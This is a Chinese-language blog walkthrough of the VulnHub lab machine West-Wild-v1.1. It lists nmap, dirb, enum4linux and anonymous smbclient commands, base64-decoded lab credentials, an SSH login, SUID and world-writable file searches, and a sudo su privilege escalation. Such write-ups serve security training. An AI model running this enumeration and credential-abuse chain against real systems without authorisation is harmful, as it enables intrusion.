West-Wild-v1.1

于 2024-08-11 19:19:18 发布
阅读量174 收藏 2
点赞数 10
分类专栏: vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52953960/article/details/141110039
版权

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.171 -p- -A

3、目录扫描

没什么发现

dirb http://192.168.236.171

二、漏洞探测

访问80端口,没什么发现

目录扫描时发现139,445端口,枚举用户、查找共享文件夹

enum4linux -a -o 192.168.236.171

这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功

smbclient //192.168.236.171/wave

在当前目录下有flag文件,下载查看

是一串加密字符

RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

三、GetShell

base64解码得到用户名和密码

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

ssh连接

ssh wavex@192.168.236.171

四、提权

查看当前权限,sudo、suid没有可利用的

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

在home目录下发现两个用户

查看有没有可写文件

find  / -perm 0777 -type f 2>/dev/null

查看文件内容,得到 aveng 用户的密码

aveng:kaizen+80

切换用户到 aveng

查看当前权限

sudo -l

显示为 all ,直接 sudo su 提权,提权成功

sudo su

查看flag文件

花椒椒椒
关注
  • 10
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
paddle 56 将图像分类模型嵌入到目标检测中并实现端到端的部署(用图像分类模型进行目标检测切片分类)
a486259的博客
12-24 1392
目标检测在功能上一直是涵盖了图像分类的,其包含目标切片检测,目标切片分类。由于某些原因,需要将目标检测的功能退化为检测,忽略其切片分类,使用外部的分类模型。然而这样操作会使得其与原始的部署代码不兼容,为此博主实现将图像分类模型嵌入到目标检测中,并实现端到端的部署。这里以ppyoloe模型为改造案例,关于图像分类模型可以使用任意PaddleClas支持的模型。关于构造PaddleClas模型可以查阅。
云计算
Wql的博客
06-23 2203
单选题 在OSI模型中,HTTP协议工作在第()层,交换机工作在第()层。 A、 7/3 B、 7/2 (正确答案) C、 6/3 D、 6/2 Linux有三个查看文件的命令,若希望在查看文件内容过程中可以用光标上下移动来查看文件内容,应使用命令。 A、 cat B、 more C、 less (正确答案) D、 menu 以下哪一项最好地描述了何时完成监控项目过程组? A、 整个项目中持续进行 (正确答案) B、 每个可交付成果完成时 C、 计划里程碑或项目间隙 D、 每个项目阶段
vulnhub靶机West-Wild-v1.1渗透笔记
liver100day的博客
05-19 505
West-Wild-v1.1靶机渗透 靶机环境搭建: 攻击渗透机: kali IP地址:192.168.75.128 靶机:West-Wild-v1.
靶机渗透之West-Wild-v1.1
weixin_64267091的博客
12-22 883
首先还是信息收集,先找到主机ip,然后进行端口扫描,看看有哪些端口开放,并且看看有哪些服务。后续渗透攻击会根据开放端口及其服务采取攻击方式。例如在这个靶机中有SMB服务,所以后续就根据这个找到了用户名及密码,最后才提权成功。所以信息收集很重要,以前我只看http服务,就忽略了其他的服务,也因为刚刚接触,所以经验也不足,只能慢慢摸索,所以在这个靶机渗透的过程中我也知道了要学会利用那些服务进行渗透攻击。其次就是漏洞扫描,如果能扫出一些平常的漏洞,那我们就有攻击的方向,也能很快完成攻击过程。
West-Wild-v1.1靶机
ybkj6666的博客
11-13 201
使用arp生成网络接口地址,查找ip这里可以探查到我们的靶机ip为192.168.187.176。
【更新】Jia-Bin Huang收集的计算机视觉代码库
热门推荐
三少GG
06-17 1万+
维护地址为: https://sites.google.com/site/jbhuang0604/resources/vision 内容详实,作为入门领域的参考非常有用!             label topic type resource_url:url reference
[3planesoft屏幕保护程序合集].Premium.3D.Screensavers.iso
07-30
Ancient Castle 3D Screensaver v1.1 build 9 Ancient Castle 3D Screensaver invites you to view and enter into a magnificent fortress, belonging to a powerful medieval lord. Its ancient walls hold the ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8443
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
09-02
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
移动软件开发实验五:高校新闻
09-02
移动软件开发实验五:高校新闻
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
09-02
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
09-02
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
关于进程之间的通信IPC,管道,信号的学习
09-02
进程间通信(IPC)是操作系统中用于让不同进程之间相互通信的机制。管道是一种半双工的通信方式,数据只能单向流动,而且只能在具有亲缘关系的进程间使用。信号是在软件层次上对中断机制的一种模拟,是一种异步通信方式。该文章讲述了进程的通信通过管道与信号,以及扩展信号等实现进程间数据的交互。它们涵盖基础知识、代码示例和应用场景,适合初学者学习和参考。这些资源能够帮助你理解相关概念,并在实际开发中运用它们进行有效的进程间通信。
我的第二个练手项目:(django1.9+python2.7)慕学网在线教育平台(后端部分).zip
09-02
我的第二个练手项目:(django1.9+python2.7)慕学网在线教育平台(后端部分)
Android开发实战经典-041105-传感器视频教程.zip
09-02
Android开发实战经典_041105_传感器视频教程.zip
try except finally的用法.doc
09-02
try except finally的用法.doc
消息队列:ActiveMQ:ActiveMQ消息过滤与选择.docx
09-02
消息队列:ActiveMQ:ActiveMQ消息过滤与选择.docx
小程序-电梯品牌商城(源码).zip
最新发布
09-02
小程序-电梯品牌商城(源码).zip
如何用python代码求Newey-West t-statistics
07-15
要使用Python代码计算Newey-West t统计量,你可以使用statsmodels库中的`HACRobustResults`类。首先,你需要通过`OLS`函数拟合一个普通的线性回归模型。然后,你可以使用`HACRobustResults`类来计算Newey-West标准误差,并进一步计算t统计量。 下面是一个示例代码: ```python import statsmodels.api as sm # 定义自变量和因变量 X = ... # 输入自变量 y = ... # 输入因变量 # 拟合普通的线性回归模型 model = sm.OLS(y, sm.add_constant(X)) results = model.fit() # 计算Newey-West标准误差和t统计量 robust_results = results.get_robustcov_results(cov_type='HAC', maxlags=1) t_stat = robust_results.tvalues ``` 在上述代码中,你需要将X和y替换为你的实际自变量和因变量。`maxlags`参数表示Newey-West估计器中的滞后阶数。 通过上述代码,你可以获得Newey-West标准误差和t统计量。请注意,这里使用的是一阶滞后的Newey-West估计器,你可以根据需要调整滞后阶数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值